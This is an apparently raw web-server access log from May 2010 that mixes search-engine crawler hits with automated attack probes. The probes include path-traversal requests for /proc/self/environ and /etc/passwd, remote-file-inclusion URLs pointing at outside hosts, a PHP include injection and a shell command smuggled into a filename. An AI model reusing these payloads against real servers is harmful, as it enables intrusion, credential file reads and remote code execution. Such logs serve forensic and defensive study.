174.36.1.97 - - [11/May/2010:05:00:21 -0500] "GET /logs/access_log.1273190400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:05:00:21 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:05:00:21 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:05:00:42 -0500] "GET /logs/access_log.1272067200//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.218.116.162 - - [11/May/2010:05:00:57 -0500] "GET /logs/access_log.1261094400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
195.228.152.176 - - [11/May/2010:05:01:55 -0500] "GET /logs/access_log.1237852800//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.813"
67.195.112.180 - - [11/May/2010:05:02:52 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 3450 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [11/May/2010:05:03:54 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [11/May/2010:05:04:17 -0500] "GET /logs/access_log.1273190400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:05:04:18 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.151.149 - - [11/May/2010:05:04:19 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.36.1.97 - - [11/May/2010:05:04:25 -0500] "GET //index.php?option=com_fabrik&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.115.111.248 - - [11/May/2010:05:04:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
194.108.112.112 - - [11/May/2010:05:06:04 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:05:06:04 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
194.108.112.112 - - [11/May/2010:05:06:04 -0500] "GET /logs//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
211.236.43.200 - - [11/May/2010:05:07:58 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
123.30.181.5 - - [11/May/2010:05:11:56 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:05:11:56 -0500] "GET /logs/access_log.1217376000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
123.30.181.5 - - [11/May/2010:05:11:56 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.50.189.221 - - [11/May/2010:05:13:06 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:05:13:07 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
210.50.189.221 - - [11/May/2010:05:13:08 -0500] "GET /logs//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.172.150.13 - - [11/May/2010:05:14:02 -0500] "GET /logs/access_log.1213833600//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 320 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:05:14:04 -0500] "GET //home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 293 "-""libwww-perl/5.825"
217.172.150.13 - - [11/May/2010:05:14:09 -0500] "GET /logs//home.php?action=http://www.sle.ro/a??? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
207.46.199.179 - - [11/May/2010:05:17:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:05:17:58 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.235.18.119 - - [11/May/2010:05:18:01 -0500] "GET /logs/access_log.1272067200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
119.235.18.119 - - [11/May/2010:05:18:01 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
119.235.18.119 - - [11/May/2010:05:18:02 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5130 "-""libwww-perl/5.831"
216.129.119.44 - - [11/May/2010:05:20:23 -0500] "GET /logs/access_log.1237248000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
174.36.1.97 - - [11/May/2010:05:22:00 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:05:22:00 -0500] "GET //index.php?option=com_fabrik&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.36.1.97 - - [11/May/2010:05:22:00 -0500] "GET /logs//index.php?option=com_fabrik&controller../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [11/May/2010:05:22:53 -0500] "GET /logs/access_log.1161648000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.51.110 - - [11/May/2010:05:23:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.134.238.142 - - [11/May/2010:05:23:20 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
65.55.51.110 - - [11/May/2010:05:23:48 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [11/May/2010:05:24:11 -0500] "GET /logs/access_log.1217980800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.163 - - [11/May/2010:05:24:57 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.11 - - [11/May/2010:05:31:25 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [11/May/2010:05:32:02 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
205.134.238.142 - - [11/May/2010:05:35:15 -0500] "GET /logs/access_log.1273276800//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:05:35:15 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:05:35:15 -0500] "GET /logs//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
207.46.204.193 - - [11/May/2010:05:36:39 -0500] "GET /logs/access_log.1229385600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
205.134.238.142 - - [11/May/2010:05:37:12 -0500] "GET /logs/access_log.1272067200//*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:05:39:17 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:05:39:17 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
205.134.238.142 - - [11/May/2010:05:39:17 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
207.46.195.236 - - [11/May/2010:05:42:09 -0500] "GET /logs/access_log.1170115200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.235 - - [11/May/2010:05:43:09 -0500] "GET /logs/access_log.1177459200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [11/May/2010:05:44:05 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 200 827 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:05:44:07 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [11/May/2010:05:49:37 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
69.64.52.86 - - [11/May/2010:05:50:07 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
213.149.105.8 - - [11/May/2010:05:54:20 -0500] "GET /logs/access_log.1264809600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:54:20 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:54:21 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:54:36 -0500] "GET /logs/access_log.1263168000/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:55:21 -0500] "GET /logs/access_log.1263945600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:55:22 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:55:22 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:05:55:22 -0500] "GET /logs/access_log.1264809600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
205.134.238.142 - - [11/May/2010:05:56:50 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
211.174.62.150 - - [11/May/2010:06:00:58 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
211.174.62.150 - - [11/May/2010:06:00:58 -0500] "GET //*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-""libwww-perl/5.808"
69.64.52.86 - - [11/May/2010:06:02:26 -0500] "GET /logs/access_log.1231718400//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
69.64.52.86 - - [11/May/2010:06:02:26 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
69.64.52.86 - - [11/May/2010:06:02:26 -0500] "GET /logs//index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
89.163.148.130 - - [11/May/2010:06:02:27 -0500] "GET /logs/?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:06:02:27 -0500] "GET /?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:06:02:27 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:06:02:33 -0500] "GET /?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:06:02:33 -0500] "GET /logs/access_log.1262390400/?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:06:02:33 -0500] "GET /logs/?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 200 5130 "-""Mozilla/5.0"
89.163.148.130 - - [11/May/2010:06:02:42 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.129.119.40 - - [11/May/2010:06:03:44 -0500] "GET /logs/access_log.1215302400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.164 - - [11/May/2010:06:05:17 -0500] "GET /logs/access_log.1243123200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [11/May/2010:06:06:57 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.109.102.158 - - [11/May/2010:06:07:29 -0500] "GET /logs/access_log.1263081600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:06:07:30 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:06:07:31 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
207.46.204.193 - - [11/May/2010:06:08:10 -0500] "GET /logs/access_log.1166313600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:06:08:55 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.66.214.80 - - [11/May/2010:06:10:59 -0500] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 349 "tomdolan.pconline.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
67.195.112.180 - - [11/May/2010:06:11:51 -0500] "GET /logs/access_log.1174089600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.109.102.158 - - [11/May/2010:06:16:29 -0500] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:06:16:29 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
207.46.204.177 - - [11/May/2010:06:20:11 -0500] "GET /logs/access_log.1247616000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:06:21:06 -0500] "GET /logs/access_log.1252195200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.149.105.8 - - [11/May/2010:06:23:50 -0500] "GET /errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:06:23:51 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
210.109.102.158 - - [11/May/2010:06:24:08 -0500] "GET /logs/access_log.1227484800/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:06:24:09 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
210.109.102.158 - - [11/May/2010:06:24:10 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
213.149.105.8 - - [11/May/2010:06:26:11 -0500] "GET /logs/access_log.1228089600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:06:26:12 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:06:26:12 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [11/May/2010:06:26:22 -0500] "GET /logs/access_log.1222560000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.239 - - [11/May/2010:06:30:39 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [11/May/2010:06:31:54 -0500] "GET /logs/access_log.1268870400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [11/May/2010:06:33:37 -0500] "GET /logs/access_log.1226102400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.214.101.17 - - [11/May/2010:06:33:50 -0500] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.69"
67.195.112.180 - - [11/May/2010:06:34:00 -0500] "GET /logs/access_log.1195430400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.60.41.26 - - [11/May/2010:06:34:25 -0500] "GET /logs//pages/pageHeader.php?path=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:34:25 -0500] "GET /logs/access_log.1265587200//pages/pageHeader.php?path=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:34:25 -0500] "GET //pages/pageHeader.php?path=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:34:29 -0500] "GET //pages/pageHeader.php?path=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:34:29 -0500] "GET /logs//pages/pageHeader.php?path=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:34:29 -0500] "GET /logs/access_log.1265587200//pages/pageHeader.php?path=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
207.46.13.132 - - [11/May/2010:06:34:39 -0500] "GET /logs/access_log.1254355200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.149.105.8 - - [11/May/2010:06:34:43 -0500] "GET /logs/access_log.1226966400/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:06:34:43 -0500] "GET //errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.149.105.8 - - [11/May/2010:06:34:43 -0500] "GET /logs//errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [11/May/2010:06:44:28 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.149.105.8 - - [11/May/2010:06:45:42 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://ulze.interfree.it/id.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.6.10.110 - - [11/May/2010:06:47:39 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
89.6.10.110 - - [11/May/2010:06:47:39 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.6.10.110 - - [11/May/2010:06:47:39 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.13.50 - - [11/May/2010:06:54:39 -0500] "GET /?D=D HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.125.143.154 - - [11/May/2010:06:55:26 -0500] "GET /logs/main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=pizzyisgay.txt%7Cecho%20v0pCr3w%3Bid%3Buname%7C HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
75.125.143.154 - - [11/May/2010:06:55:26 -0500] "GET /main.cgi?down_num=5466654&board=rebarz99&command=down_load&filename=pizzyisgay.txt%7Cecho%20v0pCr3w%3Bid%3Buname%7C HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
65.60.41.26 - - [11/May/2010:06:57:13 -0500] "GET //init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:13 -0500] "GET /logs//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:13 -0500] "GET //init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:13 -0500] "GET /logs//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:18 -0500] "GET /logs//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:18 -0500] "GET //init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:18 -0500] "GET /logs/access_log.1265760000//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:18 -0500] "GET /logs/access_log.1262476800//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:21 -0500] "GET /logs/access_log.1265760000//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:21 -0500] "GET /logs/access_log.1262476800//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.60.41.26 - - [11/May/2010:06:57:32 -0500] "GET /logs/access_log.1262476800//init.poll.php?include_class=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
